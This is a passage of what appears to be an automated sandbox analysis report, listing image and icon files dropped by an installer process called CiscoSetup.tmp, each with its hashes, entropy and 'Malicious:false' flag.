                                                                                                                                      SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                      MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                      SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                      SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                      SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83111
                                                                                                                                      Entropy (8bit):7.138058183615623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                      MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                      SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                      SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                      SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76349
                                                                                                                                      Entropy (8bit):6.476357962983417
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                      MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                      SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                      SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                      SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):83426
                                                                                                                                      Entropy (8bit):7.358868361468608
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                      MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                      SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                      SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                      SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16443
                                                                                                                                      Entropy (8bit):7.760065707691873
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                      MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                      SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                      SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                      SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):75452
                                                                                                                                      Entropy (8bit):6.447447333863436
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                      MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                      SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                      SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                      SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):76615
                                                                                                                                      Entropy (8bit):6.470162664157233
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                      MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                      SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                      SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                      SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399779
                                                                                                                                      Entropy (8bit):7.9639437199622165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                      MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                      SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                      SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                      SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......JFIF.....H.H.....,Photoshop 3.0.8BIM.........H.......H........D.http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpGImg="http://ns.adobe.com/xap/1.0/g/img/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:illustrator="http://ns.adobe.com/illustrator/1.0/". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <dc:format>image/jpeg</dc:format>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang="x-default">Ba
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.044905068349432
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                      MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                      SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                      SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                      SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0468421318534369
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                      MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                      SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                      SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                      SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2213
                                                                                                                                      Entropy (8bit):4.905752993252195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                      MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                      SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                      SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                      SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5494
                                                                                                                                      Entropy (8bit):1.0422788649872297
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                      MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                      SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                      SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                      SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2002
                                                                                                                                      Entropy (8bit):7.874049849617631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                      MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                      SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                      SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                      SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12124
                                                                                                                                      Entropy (8bit):7.978101118980993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                      MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                      SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                      SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                      SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                      MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                      SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                      SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                      SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                      MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                      SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                      SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                      SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9482
                                                                                                                                      Entropy (8bit):7.969513879342907
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                      MD5:21841588532E34397E478E791A064F2C
                                                                                                                                      SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                      SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                      SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                      MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                      SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                      SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                      SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                      MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                      SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                      SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                      SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                      SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                      SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4370
                                                                                                                                      Entropy (8bit):7.900909498577029
                                                                                                                                      Encrypted:false
